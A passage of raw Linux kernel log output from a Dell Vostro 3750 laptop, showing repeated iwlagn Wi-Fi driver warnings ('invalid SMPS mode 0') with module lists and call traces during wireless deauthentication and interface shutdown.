snd_timer snd_seq_device cryptd aes_x86_64 aes_generic iTCO_wdt snd psmouse intel_agp i2c_algo_bit i2c_i801 iwlagn dell_laptop dell_wmi ecb iTCO_vendor_support i2c_core soundcore serio_raw sparse_keymap evdev intel_gtt pcspkr mxm_wmi btusb dcdbas agpgart snd_page_alloc mac80211 wmi bluetooth cfg80211 processor vid Jan 16 01:00:05 WZLap kernel: eo ac button battery rfkill power_supply ext4 mbcache jbd2 crc16 dm_mod ums_realtek usb_storage uas sr_mod sd_mod cdrom crc_t10dif xhci_hcd ahci libahci libata scsi_mod thermal thermal_sys ehci_hcd usbcore r8169 mii [last unloaded: scsi_wait_scan] Jan 16 01:00:05 WZLap kernel: [ 830.695613] Pid: 1535, comm: wpa_supplicant Not tainted 3.1.6 #1 Jan 16 01:00:05 WZLap kernel: [ 830.698749] Call Trace: Jan 16 01:00:05 WZLap kernel: [ 830.701867] [&lt;ffffffff81045573&gt;] ? warn_slowpath_common+0x78/0x8c Jan 16 01:00:05 WZLap kernel: [ 830.705024] [&lt;ffffffff8104561f&gt;] ? warn_slowpath_fmt+0x45/0x4a Jan 16 01:00:05 WZLap kernel: [ 830.708156] [&lt;ffffffff81287823&gt;] ? netlink_broadcast_filtered+0x243/0x273 Jan 16 01:00:05 WZLap kernel: [ 830.711282] [&lt;ffffffffa02bb398&gt;] ? iwlagn_set_rxon_chain+0x107/0x1b2 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.714407] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.717557] [&lt;ffffffffa02c500c&gt;] ? iwlagn_bss_info_changed+0x225/0x493 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.720700] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.723910] [&lt;ffffffffa0214176&gt;] ? __ieee80211_recalc_idle+0xef/0x199 [mac80211] Jan 16 01:00:05 WZLap kernel: [ 830.727104] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.730322] [&lt;ffffffffa0214d48&gt;] ? ieee80211_recalc_idle+0x1e/0x42 [mac80211] Jan 16 01:00:05 WZLap kernel: [ 830.733577] [&lt;ffffffffa02117ae&gt;] ? ieee80211_mgd_deauth+0x19c/0x1c0 [mac80211] Jan 16 01:00:05 WZLap kernel: [ 830.736793] [&lt;ffffffffa024b71a&gt;] ? __cfg80211_mlme_deauth+0x107/0x116 [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.740001] [&lt;ffffffff81323ff2&gt;] ? schedule_hrtimeout_range_clock+0xc8/0x103 Jan 16 01:00:05 WZLap kernel: [ 830.743220] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.746418] [&lt;ffffffffa024b792&gt;] ? cfg80211_mlme_deauth+0x69/0x82 [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.749651] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.752859] [&lt;ffffffffa02425e5&gt;] ? nl80211_deauthenticate+0xbc/0xc7 [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.756051] [&lt;ffffffffa02445b0&gt;] ? nl80211_pre_doit+0x85/0xfb [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.759198] [&lt;ffffffff81288f61&gt;] ? genl_rcv_msg+0x1cb/0x1f9 Jan 16 01:00:05 WZLap kernel: [ 830.762321] [&lt;ffffffff81288d96&gt;] ? genl_rcv+0x28/0x28 Jan 16 01:00:05 WZLap kernel: [ 830.765449] [&lt;ffffffff812889f4&gt;] ? netlink_rcv_skb+0x36/0x7a Jan 16 01:00:05 WZLap kernel: [ 830.768564] [&lt;ffffffff81288d8d&gt;] ? genl_rcv+0x1f/0x28 Jan 16 01:00:05 WZLap kernel: [ 830.771673] [&lt;ffffffff81288525&gt;] ? netlink_unicast+0xe6/0x14e Jan 16 01:00:05 WZLap kernel: [ 830.774805] [&lt;ffffffff81288807&gt;] ? netlink_sendmsg+0x27a/0x2b2 Jan 16 01:00:05 WZLap kernel: [ 830.777921] [&lt;ffffffff81100d95&gt;] ? __pollwait+0xce/0xce Jan 16 01:00:05 WZLap kernel: [ 830.781045] [&lt;ffffffff8125878f&gt;] ? sock_sendmsg+0xc1/0xde Jan 16 01:00:05 WZLap kernel: [ 830.784155] [&lt;ffffffff8125866e&gt;] ? sock_recvmsg+0xcd/0xec Jan 16 01:00:05 WZLap kernel: [ 830.787242] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.790333] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.793415] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.796494] [&lt;ffffffff81261bd0&gt;] ? copy_from_user+0x18/0x30 Jan 16 01:00:05 WZLap kernel: [ 830.799579] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.802684] [&lt;ffffffff81258a24&gt;] ? __sys_sendmsg+0x1e8/0x288 Jan 16 01:00:05 WZLap kernel: [ 830.802692] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.802696] [&lt;ffffffff8105535c&gt;] ? set_current_blocked+0x2d/0x43 Jan 16 01:00:05 WZLap kernel: [ 830.802701] [&lt;ffffffff8100e292&gt;] ? do_signal+0x526/0x5fc Jan 16 01:00:05 WZLap kernel: [ 830.802705] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.802709] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.802713] [&lt;ffffffff810155b6&gt;] ? check_for_xstate+0x27/0x7c Jan 16 01:00:05 WZLap kernel: [ 830.802719] [&lt;ffffffff8101589f&gt;] ? restore_i387_xstate+0xa7/0x158 Jan 16 01:00:05 WZLap kernel: [ 830.802722] [&lt;ffffffff81055dc7&gt;] ? do_sigaltstack+0xaa/0x13e Jan 16 01:00:05 WZLap kernel: [ 830.802728] [&lt;ffffffff810f43ce&gt;] ? fget_light+0x2c/0x73 Jan 16 01:00:05 WZLap kernel: [ 830.802732] [&lt;ffffffff8125a392&gt;] ? sys_sendmsg+0x39/0x58 Jan 16 01:00:05 WZLap kernel: [ 830.802737] [&lt;ffffffff81329712&gt;] ? system_call_fastpath+0x16/0x1b Jan 16 01:00:05 WZLap kernel: [ 830.802740] ---[ end trace 8c75c33e0520ab57 ]--- Jan 16 01:00:05 WZLap kernel: [ 830.804009] ------------[ cut here ]------------ Jan 16 01:00:05 WZLap kernel: [ 830.804025] WARNING: at drivers/net/wireless/iwlwifi/iwl-agn-lib.c:1766 iwlagn_set_rxon_chain+0x107/0x1b2 [iwlagn]() Jan 16 01:00:05 WZLap kernel: [ 830.804028] Hardware name: Dell System Vostro 3750 Jan 16 01:00:05 WZLap kernel: [ 830.804029] invalid SMPS mode 0 Jan 16 01:00:05 WZLap kernel: [ 830.804031] Modules linked in: hidp hid acpi_cpufreq mperf tun cpufreq_conservative cpufreq_userspace cpufreq_stats cpufreq_powersave ipx p8023 parport_pc ppdev lp parport bnep rfcomm binfmt_misc uinput fuse nfsd nfs lockd fscache auth_rpcgss nfs_acl sunrpc ip6table_filter ip6_tables nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack xt_tcpudp xt_owner iptable_filter ip_tables x_tables loop sha256_generic cbc dm_crypt kvm_intel kvm snd_hda_codec_realtek joydev snd_hda_intel nouveau i915 snd_hda_codec snd_hwdep ttm drm_kms_helper uvcvideo videodev media v4l2_compat_ioctl32 snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_midi drm snd_rawmidi snd_seq_midi_event arc4 snd_seq snd_timer snd_seq_device cryptd aes_x86_64 aes_generic iTCO_wdt snd psmouse intel_agp i2c_algo_bit i2c_i801 iwlagn dell_laptop dell_wmi ecb iTCO_vendor_support i2c_core soundcore serio_raw sparse_keymap evdev intel_gtt pcspkr mxm_wmi btusb dcdbas agpgart snd_page_alloc mac80211 wmi bluetooth cfg80211 processor vid Jan 16 01:00:05 WZLap kernel: eo ac button battery rfkill power_supply ext4 mbcache jbd2 crc16 dm_mod ums_realtek usb_storage uas sr_mod sd_mod cdrom crc_t10dif xhci_hcd ahci libahci libata scsi_mod thermal thermal_sys ehci_hcd usbcore r8169 mii [last unloaded: scsi_wait_scan] Jan 16 01:00:05 WZLap kernel: [ 830.804091] Pid: 1535, comm: wpa_supplicant Tainted: G W 3.1.6 #1 Jan 16 01:00:05 WZLap kernel: [ 830.804092] Call Trace: Jan 16 01:00:05 WZLap kernel: [ 830.804094] [&lt;ffffffff81045573&gt;] ? warn_slowpath_common+0x78/0x8c Jan 16 01:00:05 WZLap kernel: [ 830.804096] [&lt;ffffffff8104561f&gt;] ? warn_slowpath_fmt+0x45/0x4a Jan 16 01:00:05 WZLap kernel: [ 830.804103] [&lt;ffffffffa02c994e&gt;] ? iwl_send_cmd+0x18b/0x2ea [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804108] [&lt;ffffffffa02bb398&gt;] ? iwlagn_set_rxon_chain+0x107/0x1b2 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804113] [&lt;ffffffffa02b475a&gt;] ? iwl_update_chain_flags+0x32/0x58 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804118] [&lt;ffffffffa02c1769&gt;] ? iwl_power_set_mode+0xf4/0x157 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804123] [&lt;ffffffffa02c197c&gt;] ? iwl_power_update_mode+0x1b0/0x1b9 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804129] [&lt;ffffffffa02c4d66&gt;] ? iwlagn_mac_config+0x1f3/0x274 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804131] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804138] [&lt;ffffffffa02117ae&gt;] ? ieee80211_mgd_deauth+0x19c/0x1c0 [mac80211] Jan 16 01:00:05 WZLap kernel: [ 830.804145] [&lt;ffffffffa024b71a&gt;] ? __cfg80211_mlme_deauth+0x107/0x116 [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.804147] [&lt;ffffffff81323ff2&gt;] ? schedule_hrtimeout_range_clock+0xc8/0x103 Jan 16 01:00:05 WZLap kernel: [ 830.804149] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804155] [&lt;ffffffffa024b792&gt;] ? cfg80211_mlme_deauth+0x69/0x82 [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.804157] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804163] [&lt;ffffffffa02425e5&gt;] ? nl80211_deauthenticate+0xbc/0xc7 [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.804169] [&lt;ffffffffa02445b0&gt;] ? nl80211_pre_doit+0x85/0xfb [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.804174] [&lt;ffffffff81288f61&gt;] ? genl_rcv_msg+0x1cb/0x1f9 Jan 16 01:00:05 WZLap kernel: [ 830.804177] [&lt;ffffffff81288d96&gt;] ? genl_rcv+0x28/0x28 Jan 16 01:00:05 WZLap kernel: [ 830.804179] [&lt;ffffffff812889f4&gt;] ? netlink_rcv_skb+0x36/0x7a Jan 16 01:00:05 WZLap kernel: [ 830.804181] [&lt;ffffffff81288d8d&gt;] ? genl_rcv+0x1f/0x28 Jan 16 01:00:05 WZLap kernel: [ 830.804183] [&lt;ffffffff81288525&gt;] ? netlink_unicast+0xe6/0x14e Jan 16 01:00:05 WZLap kernel: [ 830.804185] [&lt;ffffffff81288807&gt;] ? netlink_sendmsg+0x27a/0x2b2 Jan 16 01:00:05 WZLap kernel: [ 830.804187] [&lt;ffffffff81100d95&gt;] ? __pollwait+0xce/0xce Jan 16 01:00:05 WZLap kernel: [ 830.804189] [&lt;ffffffff8125878f&gt;] ? sock_sendmsg+0xc1/0xde Jan 16 01:00:05 WZLap kernel: [ 830.804191] [&lt;ffffffff8125866e&gt;] ? sock_recvmsg+0xcd/0xec Jan 16 01:00:05 WZLap kernel: [ 830.804193] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804195] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804197] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804199] [&lt;ffffffff81261bd0&gt;] ? copy_from_user+0x18/0x30 Jan 16 01:00:05 WZLap kernel: [ 830.804201] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804203] [&lt;ffffffff81258a24&gt;] ? __sys_sendmsg+0x1e8/0x288 Jan 16 01:00:05 WZLap kernel: [ 830.804205] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804207] [&lt;ffffffff8105535c&gt;] ? set_current_blocked+0x2d/0x43 Jan 16 01:00:05 WZLap kernel: [ 830.804209] [&lt;ffffffff8100e292&gt;] ? do_signal+0x526/0x5fc Jan 16 01:00:05 WZLap kernel: [ 830.804211] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804213] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804215] [&lt;ffffffff810155b6&gt;] ? check_for_xstate+0x27/0x7c Jan 16 01:00:05 WZLap kernel: [ 830.804217] [&lt;ffffffff8101589f&gt;] ? restore_i387_xstate+0xa7/0x158 Jan 16 01:00:05 WZLap kernel: [ 830.804219] [&lt;ffffffff81055dc7&gt;] ? do_sigaltstack+0xaa/0x13e Jan 16 01:00:05 WZLap kernel: [ 830.804221] [&lt;ffffffff810f43ce&gt;] ? fget_light+0x2c/0x73 Jan 16 01:00:05 WZLap kernel: [ 830.804223] [&lt;ffffffff8125a392&gt;] ? sys_sendmsg+0x39/0x58 Jan 16 01:00:05 WZLap kernel: [ 830.804226] [&lt;ffffffff81329712&gt;] ? system_call_fastpath+0x16/0x1b Jan 16 01:00:05 WZLap kernel: [ 830.804227] ---[ end trace 8c75c33e0520ab58 ]--- Jan 16 01:00:05 WZLap kernel: [ 830.804228] ------------[ cut here ]------------ Jan 16 01:00:05 WZLap kernel: [ 830.804233] WARNING: at drivers/net/wireless/iwlwifi/iwl-agn-lib.c:1766 iwlagn_set_rxon_chain+0x107/0x1b2 [iwlagn]() Jan 16 01:00:05 WZLap kernel: [ 830.804234] Hardware name: Dell System Vostro 3750 Jan 16 01:00:05 WZLap kernel: [ 830.804235] invalid SMPS mode 0 Jan 16 01:00:05 WZLap kernel: [ 830.804236] Modules linked in: hidp hid acpi_cpufreq mperf tun cpufreq_conservative cpufreq_userspace cpufreq_stats cpufreq_powersave ipx p8023 parport_pc ppdev lp parport bnep rfcomm binfmt_misc uinput fuse nfsd nfs lockd fscache auth_rpcgss nfs_acl sunrpc ip6table_filter ip6_tables nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack xt_tcpudp xt_owner iptable_filter ip_tables x_tables loop sha256_generic cbc dm_crypt kvm_intel kvm snd_hda_codec_realtek joydev snd_hda_intel nouveau i915 snd_hda_codec snd_hwdep ttm drm_kms_helper uvcvideo videodev media v4l2_compat_ioctl32 snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_midi drm snd_rawmidi snd_seq_midi_event arc4 snd_seq snd_timer snd_seq_device cryptd aes_x86_64 aes_generic iTCO_wdt snd psmouse intel_agp i2c_algo_bit i2c_i801 iwlagn dell_laptop dell_wmi ecb iTCO_vendor_support i2c_core soundcore serio_raw sparse_keymap evdev intel_gtt pcspkr mxm_wmi btusb dcdbas agpgart snd_page_alloc mac80211 wmi bluetooth cfg80211 processor vid Jan 16 01:00:05 WZLap kernel: eo ac button battery rfkill power_supply ext4 mbcache jbd2 crc16 dm_mod ums_realtek usb_storage uas sr_mod sd_mod cdrom crc_t10dif xhci_hcd ahci libahci libata scsi_mod thermal thermal_sys ehci_hcd usbcore r8169 mii [last unloaded: scsi_wait_scan] Jan 16 01:00:05 WZLap kernel: [ 830.804266] Pid: 1535, comm: wpa_supplicant Tainted: G W 3.1.6 #1 Jan 16 01:00:05 WZLap kernel: [ 830.804267] Call Trace: Jan 16 01:00:05 WZLap kernel: [ 830.804268] [&lt;ffffffff81045573&gt;] ? warn_slowpath_common+0x78/0x8c Jan 16 01:00:05 WZLap kernel: [ 830.804270] [&lt;ffffffff8104561f&gt;] ? warn_slowpath_fmt+0x45/0x4a Jan 16 01:00:05 WZLap kernel: [ 830.804276] [&lt;ffffffffa02c994e&gt;] ? iwl_send_cmd+0x18b/0x2ea [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804281] [&lt;ffffffffa02bb398&gt;] ? iwlagn_set_rxon_chain+0x107/0x1b2 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804285] [&lt;ffffffffa02b475a&gt;] ? iwl_update_chain_flags+0x32/0x58 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804291] [&lt;ffffffffa02c1769&gt;] ? iwl_power_set_mode+0xf4/0x157 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804295] [&lt;ffffffffa02c197c&gt;] ? iwl_power_update_mode+0x1b0/0x1b9 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804301] [&lt;ffffffffa02c4d66&gt;] ? iwlagn_mac_config+0x1f3/0x274 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 830.804303] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804309] [&lt;ffffffffa02117ae&gt;] ? ieee80211_mgd_deauth+0x19c/0x1c0 [mac80211] Jan 16 01:00:05 WZLap kernel: [ 830.804315] [&lt;ffffffffa024b71a&gt;] ? __cfg80211_mlme_deauth+0x107/0x116 [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.804317] [&lt;ffffffff81323ff2&gt;] ? schedule_hrtimeout_range_clock+0xc8/0x103 Jan 16 01:00:05 WZLap kernel: [ 830.804319] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804325] [&lt;ffffffffa024b792&gt;] ? cfg80211_mlme_deauth+0x69/0x82 [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.804327] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804332] [&lt;ffffffffa02425e5&gt;] ? nl80211_deauthenticate+0xbc/0xc7 [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.804338] [&lt;ffffffffa02445b0&gt;] ? nl80211_pre_doit+0x85/0xfb [cfg80211] Jan 16 01:00:05 WZLap kernel: [ 830.804343] [&lt;ffffffff81288f61&gt;] ? genl_rcv_msg+0x1cb/0x1f9 Jan 16 01:00:05 WZLap kernel: [ 830.804345] [&lt;ffffffff81288d96&gt;] ? genl_rcv+0x28/0x28 Jan 16 01:00:05 WZLap kernel: [ 830.804347] [&lt;ffffffff812889f4&gt;] ? netlink_rcv_skb+0x36/0x7a Jan 16 01:00:05 WZLap kernel: [ 830.804349] [&lt;ffffffff81288d8d&gt;] ? genl_rcv+0x1f/0x28 Jan 16 01:00:05 WZLap kernel: [ 830.804352] [&lt;ffffffff81288525&gt;] ? netlink_unicast+0xe6/0x14e Jan 16 01:00:05 WZLap kernel: [ 830.804354] [&lt;ffffffff81288807&gt;] ? netlink_sendmsg+0x27a/0x2b2 Jan 16 01:00:05 WZLap kernel: [ 830.804355] [&lt;ffffffff81100d95&gt;] ? __pollwait+0xce/0xce Jan 16 01:00:05 WZLap kernel: [ 830.804357] [&lt;ffffffff8125878f&gt;] ? sock_sendmsg+0xc1/0xde Jan 16 01:00:05 WZLap kernel: [ 830.804359] [&lt;ffffffff8125866e&gt;] ? sock_recvmsg+0xcd/0xec Jan 16 01:00:05 WZLap kernel: [ 830.804362] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804364] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804366] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804368] [&lt;ffffffff81261bd0&gt;] ? copy_from_user+0x18/0x30 Jan 16 01:00:05 WZLap kernel: [ 830.804370] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804372] [&lt;ffffffff81258a24&gt;] ? __sys_sendmsg+0x1e8/0x288 Jan 16 01:00:05 WZLap kernel: [ 830.804374] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804375] [&lt;ffffffff8105535c&gt;] ? set_current_blocked+0x2d/0x43 Jan 16 01:00:05 WZLap kernel: [ 830.804377] [&lt;ffffffff8100e292&gt;] ? do_signal+0x526/0x5fc Jan 16 01:00:05 WZLap kernel: [ 830.804380] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 830.804381] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 830.804383] [&lt;ffffffff810155b6&gt;] ? check_for_xstate+0x27/0x7c Jan 16 01:00:05 WZLap kernel: [ 830.804386] [&lt;ffffffff8101589f&gt;] ? restore_i387_xstate+0xa7/0x158 Jan 16 01:00:05 WZLap kernel: [ 830.804387] [&lt;ffffffff81055dc7&gt;] ? do_sigaltstack+0xaa/0x13e Jan 16 01:00:05 WZLap kernel: [ 830.804390] [&lt;ffffffff810f43ce&gt;] ? fget_light+0x2c/0x73 Jan 16 01:00:05 WZLap kernel: [ 830.804392] [&lt;ffffffff8125a392&gt;] ? sys_sendmsg+0x39/0x58 Jan 16 01:00:05 WZLap kernel: [ 830.804394] [&lt;ffffffff81329712&gt;] ? system_call_fastpath+0x16/0x1b Jan 16 01:00:05 WZLap kernel: [ 830.804395] ---[ end trace 8c75c33e0520ab59 ]--- Jan 16 01:00:05 WZLap kernel: [ 830.804416] cfg80211: Calling CRDA to update world regulatory domain Jan 16 01:00:05 WZLap kernel: [ 831.240157] ------------[ cut here ]------------ Jan 16 01:00:05 WZLap kernel: [ 831.242680] WARNING: at drivers/net/wireless/iwlwifi/iwl-agn-lib.c:1766 iwlagn_set_rxon_chain+0x107/0x1b2 [iwlagn]() Jan 16 01:00:05 WZLap kernel: [ 831.245165] Hardware name: Dell System Vostro 3750 Jan 16 01:00:05 WZLap kernel: [ 831.247535] invalid SMPS mode 0 Jan 16 01:00:05 WZLap kernel: [ 831.247568] Modules linked in: hidp hid acpi_cpufreq mperf tun cpufreq_conservative cpufreq_userspace cpufreq_stats cpufreq_powersave ipx p8023 parport_pc ppdev lp parport bnep rfcomm binfmt_misc uinput fuse nfsd nfs lockd fscache auth_rpcgss nfs_acl sunrpc ip6table_filter ip6_tables nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack xt_tcpudp xt_owner iptable_filter ip_tables x_tables loop sha256_generic cbc dm_crypt kvm_intel kvm snd_hda_codec_realtek joydev snd_hda_intel nouveau i915 snd_hda_codec snd_hwdep ttm drm_kms_helper uvcvideo videodev media v4l2_compat_ioctl32 snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_midi drm snd_rawmidi snd_seq_midi_event arc4 snd_seq snd_timer snd_seq_device cryptd aes_x86_64 aes_generic iTCO_wdt snd psmouse intel_agp i2c_algo_bit i2c_i801 iwlagn dell_laptop dell_wmi ecb iTCO_vendor_support i2c_core soundcore serio_raw sparse_keymap evdev intel_gtt pcspkr mxm_wmi btusb dcdbas agpgart snd_page_alloc mac80211 wmi bluetooth cfg80211 processor vid Jan 16 01:00:05 WZLap kernel: eo ac button battery rfkill power_supply ext4 mbcache jbd2 crc16 dm_mod ums_realtek usb_storage uas sr_mod sd_mod cdrom crc_t10dif xhci_hcd ahci libahci libata scsi_mod thermal thermal_sys ehci_hcd usbcore r8169 mii [last unloaded: scsi_wait_scan] Jan 16 01:00:05 WZLap kernel: [ 831.249871] Pid: 1521, comm: NetworkManager Tainted: G W 3.1.6 #1 Jan 16 01:00:05 WZLap kernel: [ 831.249874] Call Trace: Jan 16 01:00:05 WZLap kernel: [ 831.249883] [&lt;ffffffff81045573&gt;] ? warn_slowpath_common+0x78/0x8c Jan 16 01:00:05 WZLap kernel: [ 831.249889] [&lt;ffffffff8104561f&gt;] ? warn_slowpath_fmt+0x45/0x4a Jan 16 01:00:05 WZLap kernel: [ 831.249898] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 831.249910] [&lt;ffffffffa02bb398&gt;] ? iwlagn_set_rxon_chain+0x107/0x1b2 [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 831.249928] [&lt;ffffffff81324754&gt;] ? _raw_spin_lock_irq+0xa/0x14 Jan 16 01:00:05 WZLap kernel: [ 831.249932] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 831.249939] [&lt;ffffffffa02bfc28&gt;] ? iwl_teardown_interface+0x4a/0x7e [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 831.249946] [&lt;ffffffffa02c0505&gt;] ? iwl_mac_remove_interface+0x4e/0x5e [iwlagn] Jan 16 01:00:05 WZLap kernel: [ 831.249956] [&lt;ffffffffa0214539&gt;] ? ieee80211_do_stop+0x319/0x46a [mac80211] Jan 16 01:00:05 WZLap kernel: [ 831.249961] [&lt;ffffffff8104a997&gt;] ? _local_bh_enable_ip.isra.11+0x1e/0x88 Jan 16 01:00:05 WZLap kernel: [ 831.249968] [&lt;ffffffffa021469d&gt;] ? ieee80211_stop+0x13/0x17 [mac80211] Jan 16 01:00:05 WZLap kernel: [ 831.249972] [&lt;ffffffff81266578&gt;] ? __dev_close_many+0x84/0xb0 Jan 16 01:00:05 WZLap kernel: [ 831.249975] [&lt;ffffffff812665d4&gt;] ? __dev_close+0x30/0x47 Jan 16 01:00:05 WZLap kernel: [ 831.249978] [&lt;ffffffff8126a883&gt;] ? dev_set_rx_mode+0x1d/0x29 Jan 16 01:00:05 WZLap kernel: [ 831.249982] [&lt;ffffffff8126ab0e&gt;] ? __dev_change_flags+0x9d/0x118 Jan 16 01:00:05 WZLap kernel: [ 831.249985] [&lt;ffffffff8126abec&gt;] ? dev_change_flags+0x12/0x42 Jan 16 01:00:05 WZLap kernel: [ 831.249988] [&lt;ffffffff81274741&gt;] ? do_setlink+0x287/0x6f8 Jan 16 01:00:05 WZLap kernel: [ 831.249994] [&lt;ffffffff810e56f7&gt;] ? kmem_cache_alloc_node_trace+0x96/0x10a Jan 16 01:00:05 WZLap kernel: [ 831.249997] [&lt;ffffffff81274f33&gt;] ? __rtnl_unlock+0xc/0xc Jan 16 01:00:05 WZLap kernel: [ 831.250000] [&lt;ffffffff81274dfb&gt;] ? rtnl_setlink+0xc4/0xe6 Jan 16 01:00:05 WZLap kernel: [ 831.250004] [&lt;ffffffff812889f4&gt;] ? netlink_rcv_skb+0x36/0x7a Jan 16 01:00:05 WZLap kernel: [ 831.250008] [&lt;ffffffff81274376&gt;] ? rtnetlink_rcv+0x1f/0x28 Jan 16 01:00:05 WZLap kernel: [ 831.250011] [&lt;ffffffff81288525&gt;] ? netlink_unicast+0xe6/0x14e Jan 16 01:00:05 WZLap kernel: [ 831.250014] [&lt;ffffffff81288807&gt;] ? netlink_sendmsg+0x27a/0x2b2 Jan 16 01:00:05 WZLap kernel: [ 831.250018] [&lt;ffffffff8125878f&gt;] ? sock_sendmsg+0xc1/0xde Jan 16 01:00:05 WZLap kernel: [ 831.250021] [&lt;ffffffff8125866e&gt;] ? sock_recvmsg+0xcd/0xec Jan 16 01:00:05 WZLap kernel: [ 831.250025] [&lt;ffffffff8125878f&gt;] ? sock_sendmsg+0xc1/0xde Jan 16 01:00:05 WZLap kernel: [ 831.250028] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 831.250031] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 831.250035] [&lt;ffffffff8132345a&gt;] ? _cond_resched+0x7/0x1c Jan 16 01:00:05 WZLap kernel: [ 831.250038] [&lt;ffffffff81261bd0&gt;] ? copy_from_user+0x18/0x30 Jan 16 01:00:05 WZLap kernel: [ 831.250041] [&lt;ffffffff81035379&gt;] ? should_resched+0x5/0x23 Jan 16 01:00:05 WZLap kernel: [ 831.250044] [&lt;ffffffff81258a24&gt;] ? __sys_sendmsg+0x1e8/0x288 Jan 16 01:00:05 WZLap kernel: [ 